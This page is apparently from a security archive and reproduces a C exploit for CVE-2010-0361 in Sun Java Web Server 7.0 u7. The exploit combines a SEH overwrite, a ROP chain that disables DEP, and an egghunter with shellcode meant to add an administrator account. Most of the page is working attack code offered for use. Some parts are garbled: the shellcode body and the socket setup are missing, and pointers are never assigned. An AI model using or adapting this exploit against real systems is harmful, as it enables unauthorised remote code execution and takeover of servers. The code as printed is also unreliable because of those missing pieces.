首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
Sun Java Web Server 7.0 u7 Exploit with DEP bypass
来源:dmc@deadbeef.co.uk 作者:dmc 发布时间:2010-07-09  

# Exploit Title: [SJWSexv2]
# Date: [09/07/2010]
# Author: [dmc]
# Software Link: [download link if available]
# Version: [7.0 u7]
# Tested on: [Windows XP SP3 - with and without DEP]
# CVE : [CVE-2010-0361]

/* Sun Java Web Server Exploit v2
 * Tested on:
 * Sun Java Web Server 7.0 update 7 - XP SP3
 * Ref: CVE-2010-0361
 * This exploit is capable of bypassing DEP.
 * In order to do this it uses ROP to invoke
 * SetProcessDEPPolicy().
 * Author: Dominic Chell <dmc@deadbeef.co.uk>
 * Date: 08/07/2010

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include "winsock2.h"

#pragma comment(lib, "ws2_32")

#define usage(){(void)fprintf(stderr, "SJWSexv2 vs Sun Java Web Server 7.0 u7\n(C) dmc <dmc@deadbeef.co.uk>\n\nUsage: sjwsex.exe [ip] [port] [directory]\nExample: sjwsex.exe 80 test\n");}
#define error(e){ (void)fprintf(stderr,"%s\n",e); return -1;}

// encoding the payloads in URL hex prevents it getting converted to unicode
char seh[] = "%90%80%02%10"; // 0x10028090 :  # ADD ESP,700 # RETN    [Module : ns-httpd40.dll]
char *nop = "%90"; // nop
char egghunter[] = "%66%81%CA%FF%0F%42%52%6A%02%58%CD%2E%3C%05%5A%74%EF%B8%77%30%30%74%8B%FA%AF%75%EA%AF%75%E7%FF%E7";
char *egg = "%77%30%30%74%77%30%30%74"; // w00tw00t
char *deadbeef = "%ef%be%ad%de";
char *ropayload = "%F2%C2%02%10" // 0x1002C2F2 :  # OR EAX,FFFFFFFF # POP EBX # RETN      [Module : ns-httpd40.dll]
    "%FF%FF%FF%FF" // put in to ebx
    "%4C%C1%02%10" // 0x1002C14C :  # INC EBX # XOR EAX,EAX # RETN  [Module : ns-httpd40.dll]
    "%E8%45%0D%10" // 0x100D45E8 :  # OR EAX,FFFFFFFF # POP EBP # RETN      [Module : ns-httpd40.dll]
    "%A4%22%86%7C" // 0x7C8622A4 SetProcessDEPPolicy, into EBP
    "%9D%31%08%10" // 0x1008319D :  # OR EAX,FFFFFFFF # POP EDI # RETN      [Module : ns-httpd40.dll]
    "%BF%13%01%10" // 0x100113BF :  # NOP # MOV EAX,DWORD PTR SS:[ESP+4] # MOV EAX,DWORD PTR DS:[EAX+14] # RETN       [Module : ns-httpd40.dll]
    "%BA%13%01%10" // 0x100113BA :  # POP ESI # RETN  [Module : ns-httpd40.dll]
    "%BF%13%01%10" // 0x100113BF :  # NOP # MOV EAX,DWORD PTR SS:[ESP+4] # MOV EAX,DWORD PTR DS:[EAX+14] # RETN       [Module : ns-httpd40.dll]
    "%0D%7C%0A%10"; // 0x100A7C0D :  # PUSHAD # RETN   [Module : ns-httpd40.dll]
// adduser r00t / r00tr00t123
char shellcode[] =

int send_buffer(int ipaddr, int port, char *buffer)
 struct fd_set mask;
 struct timeval timeout;
 struct sockaddr_in server;
 WSADATA info;
    if (WSAStartup(MAKEWORD(2,0), &info)) error("Unable to start WSA");

 if (s==INVALID_SOCKET) error("[*] socket error");

 WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);

   if (send(s,buffer,strlen(buffer),0)==SOCKET_ERROR) error("[*] error sending buffer\n");
   return 0;

int main(int argc, char *argv[])
 char *verb="GET /";
 char *options="OPTIONS /";
 char *version=" HTTP/1.0";
 char *directory="";
 char *payload, *ptr, *buffer;
 char nopsled1[1510], nopsled2[190], padding[400], padding2[210];
 if(argc < 4)
  return 0;

 int ipaddr=htonl(inet_addr(argv[1])), port=atoi(argv[2]);
 directory = argv[3];
 fprintf(stderr, "SJWSexv2 vs Sun Java Web Server 7.0 u7\n(C) dmc <dmc@deadbeef.co.uk>\n\n");

 int nopslen = 136 - strlen(directory);

 memset(nopsled1, 0x00, sizeof(nopsled1));
 for(int i=0;i<500;i++)
  strcat(nopsled1, nop);

 memset(padding, 0x00, sizeof(padding));
 for(int i=0;i<nopslen;i++)
  strcat(padding, nop);

 memset(nopsled2, 0x00, sizeof(nopsled2));
 for(int i=0;i<60;i++)
  strcat(nopsled2, nop);

 memset(padding2, 0x00, sizeof(padding2));
 for(int i=0; i<200; i++)
  padding2[i] = 'B';

 // build payload and place shellcode in memory
 payload = (char*)malloc(strlen(egg)+strlen(shellcode)+strlen(verb)+strlen(version)+2);
 memset(payload, 0x00, sizeof(payload));
 memcpy(ptr, verb, strlen(verb));
 memcpy(ptr, egg, strlen(egg));
 memcpy(ptr, shellcode, strlen(shellcode));
 memcpy(ptr, version, strlen(version));
 memcpy(ptr, "\n\0", 2);

 fprintf(stderr, "%s\n", "[*] Filling memory with shellcode");
 for (int i=0; i<4; i++)
  send_buffer(ipaddr, port, payload);

 // build final buffer and overwrite seh
 int len=0;
 // seh overwritten at 768
 len = strlen(options) + strlen(directory) + strlen(padding) + strlen(ropayload) + strlen(nopsled1);
 len = len + strlen(egghunter) + strlen(seh) + strlen(nopsled2) + strlen(padding2) + strlen(version) + 3;

 memset(buffer, 0x00, sizeof(buffer));
 memcpy(ptr, options, strlen(options));
 memcpy(ptr, directory, strlen(directory));
 memcpy(ptr, "/", 1);

 memcpy(ptr, padding, strlen(padding));

 memcpy(ptr, ropayload, strlen(ropayload));

 memcpy(ptr, nopsled2, strlen(nopsled2));

 memcpy(ptr, egghunter, strlen(egghunter));

 memcpy(ptr, nopsled1, strlen(nopsled1));

 memcpy(ptr, seh, strlen(seh));

 memcpy(ptr, padding2, strlen(padding2));

 memcpy(ptr, version, strlen(version));
 memcpy(ptr, "\n\n\0", 3);

 fprintf(stderr, "%s\n", "[*] Sending final buffer");
 send_buffer(ipaddr, port, buffer);
 fprintf(stderr, "%s\n", "[*] Wait several minutes and connect with r00t / r00tr00t123");

 return 0;

[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·cmd.exe Unicode Buffer Overflo
·Write-to-file Shellcode (Win32
·91 bytes Find all writeable fo
·Shemes Grabbit suffers from a
·Ubuntu PAM MOTD File Tampering
·MP3 Cutter v1.5 DoS Exploit
·UFO: Alien Invasion v2.2.1 IRC
·FathFTP 1.7 ActiveX Buffer Ove
·Linux/x86-64 - execve("/sbin/i
·RSP MP3 Player OCX 3.2 ActiveX
·NetworX version 1.0.3 suffers
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved